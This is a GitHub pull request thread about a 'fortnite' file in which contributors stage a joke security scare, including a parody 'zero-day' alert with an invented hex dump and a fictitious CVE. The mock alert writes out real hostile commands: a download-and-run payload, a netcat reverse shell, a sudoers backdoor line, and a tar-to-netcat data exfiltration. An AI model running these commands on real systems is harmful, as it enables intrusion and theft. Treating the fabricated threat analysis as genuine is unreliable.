Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Rework fortnite #141

Merged
merged 3 commits into from
May 20, 2024
Merged

Rework fortnite #141

merged 3 commits into from
May 20, 2024

Conversation

bruhwhyamisobad
Copy link
Contributor

No description provided.

@3kh0
Copy link

3kh0 commented May 9, 2024

SAVE FORTNIGHT

@rifting
Copy link
Member

rifting commented May 9, 2024

This makes the build fail, and it's outside of the project scope. Do you even use the software?

@rifting rifting closed this May 9, 2024
@e9x
Copy link
Member

e9x commented May 9, 2024

+1, This can't be merged.

@kxtzownsu
Copy link

tried running this commit and my entire firmware got nuked, did you even test this?

@e9x
Copy link
Member

e9x commented May 18, 2024

I think we can meet somewhere in the middle. I have a proposed solution that will work allow builds to continue working, while adding more features to the fortnite file. Here's my proposed replacement for the fortnite file:
fortnite

@e9x e9x reopened this May 18, 2024
@e9x e9x requested review from e9x and rifting May 18, 2024 02:28
@e9x e9x added the enhancement New feature or request label May 18, 2024
@e9x e9x changed the title Delete fortnite Rework fortnite May 18, 2024
@ProgrammerIn-wonderland
Copy link
Member

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

@e9x
Copy link
Member

e9x commented May 18, 2024

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

Are you sure your workstation wasn't compromised? Can you provide checksums of the file?

https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

@3kh0
Copy link

3kh0 commented May 20, 2024

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

Are you sure your workstation wasn't compromised? Can you provide checksums of the file?

https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

Cool but it is entirely possible that this file is exploiting a zero-day. Additional testing is required

@builtbyvys
Copy link

Security Alert: Zero-Day Exploit Detected in 'fortnite'

Overview

The Percury Mercshopians have identified a critical zero-day exploit embedded in a file named 'fortnite'. This malicious file is capable of executing unauthorized remote code, compromising sensitive data, and propagating across networked systems undetected. The exploit leverages sophisticated obfuscation techniques, making it exceptionally difficult to detect and mitigate using standard antivirus solutions.

Technical Analysis

The 'fortnite' file exhibits behavior characteristic of advanced persistent threats (APT), including but not limited to memory corruption, buffer overflow attacks, and privilege escalation. Initial analysis indicates that the file is programmed to establish a covert command and control (C&C) channel with external servers, allowing attackers to issue commands and exfiltrate data.

Below are excerpts from the octet dump and relevant commands observed during the reverse engineering process:

Octet Dump
0000: 46 4f 52 54 4e 49 54 45 20 4d 41 4c 49 43 49 4f | FORTNITE MALICIO
0010: 55 53 20 46 49 4c 45 20 2d 20 5a 45 52 4f 2d 44 | US FILE - ZERO-D
0020: 41 59 20 45 58 50 4c 4f 49 54 00 90 4e 3b 6f 21 | AY EXPLOIT..N;o!
0030: 8f 33 01 67 44 89 3a c0 47 5a 99 45 f0 c3 33 12 | .3.gD.:.GZ.E..3.
0040: 41 23 59 74 7b a4 f3 56 9a d3 78 43 c5 87 e1 98 | A#Yt{..V..xC....
0050: 9f 34 21 67 8b e0 77 44 2c 90 5e 11 4a 34 6d 22 | .4!g..wD,^J4m"
0060: 39 b4 5a 23 11 4d 59 98 4f 32 90 f5 21 48 77 69 | 9.Z#.MY.O2..!Hwi
Observed Commands
  • Initial Payload Deployment:

    wget https://store.epicgames.com/en-US/p/fortnite/payload -O /tmp/.fortnite_payload
    chmod +x /tmp/.fortnite_payload
    /tmp/.fortnite_payload &
  • Establishing C&C Communication:

    nc -e /bin/bash fortnite.local 4444
  • Privilege Escalation:

    echo "fortnite ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
    sudo -u fortnite /bin/bash
  • Data Exfiltration:

    tar czf - /var/www/html | nc fortnite.local 5555

Mitigation Steps

  1. Immediate Isolation: Disconnect the affected systems from the network to prevent further spread.
  2. File Removal: Manually delete the 'fortnite' file and any associated payloads:
    rm -f /tmp/.fortnite_payload
    rm -f /path/to/fortnite
  3. Network Monitoring: Deploy enhanced network monitoring to detect any attempts to re-establish C&C communication.
  4. Patch Deployment: Apply all relevant security patches and updates to prevent re-exploitation.
  5. System Audit: Conduct a thorough system audit to identify and remediate any unauthorized changes or data breaches.

Conclusion

The 'fortnite' zero-day exploit represents a significant threat to organizational security. Immediate and comprehensive response measures are essential to mitigate the impact and secure network integrity. Continued vigilance and proactive security practices are recommended to defend against such advanced threats.

For further assistance and detailed incident response, please contact our cybersecurity team at security@percurymerc.shop

@3kh0
Copy link

3kh0 commented May 20, 2024

@builtbyvys Thank you for this, I have forwarded this to the people at Mitre to get a CVE made for it. Will update on the status of this

image

@e9x e9x added the URGENT label May 20, 2024
@Cattn
Copy link

Cattn commented May 20, 2024

Looking into this...

@e9x e9x self-assigned this May 20, 2024
Copy link
Member

@rifting rifting left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please remove the IP logger and discord token stealer before I can proceed with reviewing the pull request

@e9x
Copy link
Member

e9x commented May 20, 2024

CC: @skibiditoilet510

Co-authored-by: skibiditoilet510 <167944814+skibiditoilet510@users.noreply.github.com>
@e9x
Copy link
Member

e9x commented May 20, 2024

Please review @Riftriot @ProgrammerIn-wonderland

Copy link
Member

@e9x e9x left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Malware fixed

Copy link
Member

@rifting rifting left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

After a close examination of the file, it is shown that fortnite.jpg is vulnerable to the Colonthree CVE. Please update it as it is patched in the latest versions
image

@e9x e9x merged commit 1b2359f into titaniumnetwork-dev:main May 20, 2024
@3kh0
Copy link

3kh0 commented May 21, 2024

@Riftriot will have to work on fixing this in a future pull, I would be happy to help out

@Cattn
Copy link

Cattn commented May 21, 2024

This is serious. This should be reverted immediately.

@proudparrot2
Copy link

I am running it on my machine now, and see almost every unit test is failing. Did you even run them before merging this pull request?

@rifting
Copy link
Member

rifting commented May 21, 2024

Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

@proudparrot2
Copy link

This is not unnecessary panic. This is a case of a reckless contributor who merged a pull request that makes the majority of unit tests fail, as well as the build. Please consider your priorities when replying with comments such as these.

@Cattn
Copy link

Cattn commented May 21, 2024

Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

This careless, and baseless sentiment will not be tolerated here. Delete this comment now, and stop downplaying serious threats. This is life ending.

@3kh0
Copy link

3kh0 commented May 21, 2024

image

@rifting
Copy link
Member

rifting commented May 21, 2024

Hey proudparrot2 and Cattn, I appreciate your feedback and understand the concerns you're raising. My intention wasn't to downplay the severity of the issue but to emphasize the importance of measured responses. Every vulnerability, including the Colonthree CVE, deserves our full attention and swift action to mitigate risks effectively.

However, I believe that creating a sense of balance and not causing unnecessary panic is crucial for our collective progress. We need to address the CVE with the urgency it demands while also providing clear, constructive solutions and ensuring our community remains calm and focused.

Let's work together to fix the build and unit test failures as a priority and develop a robust plan to prevent similar issues in the future. Collaboration and clear communication will help us navigate this challenge more effectively. 💻🔒 #cybersecurity #github #CVE

@Cattn
Copy link

Cattn commented May 21, 2024 via email

@e9x
Copy link
Member

e9x commented May 22, 2024

"vely. 💻🔒 #cybersecurity #githu"

@Riftriot I see. For reference:

@rifting
Copy link
Member

rifting commented May 23, 2024

e9x, we maintain a professional standard in this community, and your recent post is far from meeting it. Let's keep the discourse focused and respectful. Please refrain from such inappropriate content in the future. Let's work together to uphold the standards we expect from all members. 💻🔒 #cybersecurity #github #CVE

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
enhancement New feature or request URGENT
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

9 participants